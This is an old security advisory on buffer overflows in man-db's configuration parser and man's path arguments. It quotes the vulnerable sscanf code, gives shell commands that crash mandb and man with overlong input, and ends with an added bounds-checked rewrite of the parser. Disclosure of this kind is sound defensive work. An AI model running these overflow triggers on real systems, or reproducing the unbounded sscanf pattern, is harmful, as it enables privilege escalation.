Multiple buffer overflow vulnerabilities in ManDB

Published: 2003-08-01
Updated: 2003-08-01
Severity: Medium
Threat type: Privilege escalation
Error type: Boundary check error
Exploitation: Server mode
BUGTRAQ ID: 8303

Affected systems

    man man 2.3.18

Detailed description

man-db performs no proper bounds checking around several of its sscanf() calls. Part of the affected code reads as follows:

    static void add_to_dirlist (FILE *config, int user)
    {
        char *bp;
        char buf[BUFSIZ];
        char key[50], cont[512];
        int c;

        while ((bp = fgets (buf, BUFSIZ, config))) {
            while (isspace (*bp))
                bp++;
            if (*bp == '#' || *bp == '\0')
                continue;
            else if (strncmp (bp, "NO", 2) == 0)
                continue;
            else if (sscanf (bp, "MANBIN %*s") == 1)
                continue;
            /* unbounded %s into key[50] */
            else if (sscanf (bp, "MANDATORY_MANPATH %s", key) == 1)
                add_mandatory (key);
            /* unbounded %s into key[50] and cont[512] */
            else if (sscanf (bp, "MANPATH_MAP %s %s", key, cont) == 2)
                add_manpath_map (key, cont);
            /* unbounded %s into key[50] and cont[512] */
            else if ((c = sscanf (bp, "MANDB_MAP %s %s", key, cont)) > 0)
                add_mandb_map (key, cont, c, user);
            else if ((c = sscanf (bp, "DEFINE %50s %511[^\n]", key, cont)) > 0)
                add_def (key, cont, c);
            else if (sscanf (bp, "SECTION %511[^\n]", cont) == 1)
                add_sections (cont);
            else if (sscanf (bp, "SECTIONS %511[^\n]", cont) == 1)
                /* Since I keep getting it wrong ... */
                add_sections (cont);
            else {
                error (0, 0, _("can't parse directory list `%s'"), bp);
                gripe_reading_mp_config (CONFIG_FILE);
            }
        }
    }

As the code shows, the MANDATORY_MANPATH, MANPATH_MAP and MANDB_MAP entries do not limit the values written into key[50] or cont[512], so supplying an overly long string triggers the overflow. The same problem exists in the ult_src() function, and the PATH/MANPATH arguments are also insufficiently checked, which can lead to an overflow.

Test code

    # cd /tmp
    # mkdir x
    # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
    # mandb
    Segmentation fault

(can also apply this to the "man" binary, by fooling it with links)

    # cd /tmp
    # mkdir x
    # ln /usr/bin/man mandb
    # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
    # ./mandb
    Segmentation fault

    # man -M `perl -e 'print"/"x2100'`usr/share/man ls
    ...(verbose)
    Segmentation fault

    # cd /tmp
    # mkdir man man/man1
    # echo .so `perl -e 'print"x"x1024'` >man/man1/x.1
    # man -M /tmp/man x
    ...(verbose)
    Segmentation fault

    # man -M `perl -e 'print"/tmp:"x260'` x
    Segmentation fault

Solution

An update is already available from the project's CVS server: savannah.nongnu.org

Related information

Reference: http://www.securityfocus.com/archive/1/330907
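The fix pattern for the add_to_dirlist() parser above, as an added example that is not man-db's own code: each %s gets a width one less than its buffer (the original "DEFINE %50s" into key[50] still leaves no room for the NUL that sscanf appends), and a %n check rejects lines whose token was longer than the field instead of silently truncating it. The struct and function names, and the sample lines including the 8100-byte key from the test code, are constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define KEY_LEN  50   /* same buffer sizes as the original add_to_dirlist() */
#define CONT_LEN 512

struct mandb_map {
    char key[KEY_LEN];
    char cont[CONT_LEN];
};

/* Parse one "MANDB_MAP <key> [<cont>]" config line.  Returns the number of
 * fields read (1 or 2) or 0 if the line does not match or a field is longer
 * than its buffer.  Widths are buffer size minus one so that the NUL sscanf
 * appends stays inside the array (the original "%50s" into key[50] does not). */
int parse_mandb_map(const char *bp, struct mandb_map *out)
{
    int after_key = -1, after_cont = -1;
    int n;

    memset(out, 0, sizeof *out);
    n = sscanf(bp, "MANDB_MAP %49s%n %511s%n",
               out->key, &after_key, out->cont, &after_cont);
    if (n < 1)
        return 0;
    /* Truncation check: after a width-limited %s the next input character
     * must be whitespace or end of string; anything else means the token was
     * longer than the field and was cut, so the line is rejected rather than
     * silently mangled (the original code would have overflowed here). */
    if (bp[after_key] != '\0' && !isspace((unsigned char)bp[after_key]))
        return 0;
    if (n == 2 && bp[after_cont] != '\0' && !isspace((unsigned char)bp[after_cont]))
        return 0;
    return n;
}

/* Constructed sample: builds the advisory's oversized test line (8100 'x'
 * bytes as the key) in memory and parses it; expected result is 0 (rejected). */
int parse_oversized_sample(void)
{
    static char line[8200] = "MANDB_MAP ";
    struct mandb_map m;
    memset(line + 10, 'x', 8100);
    strcpy(line + 8110, " x\n");
    return parse_mandb_map(line, &m);
}
```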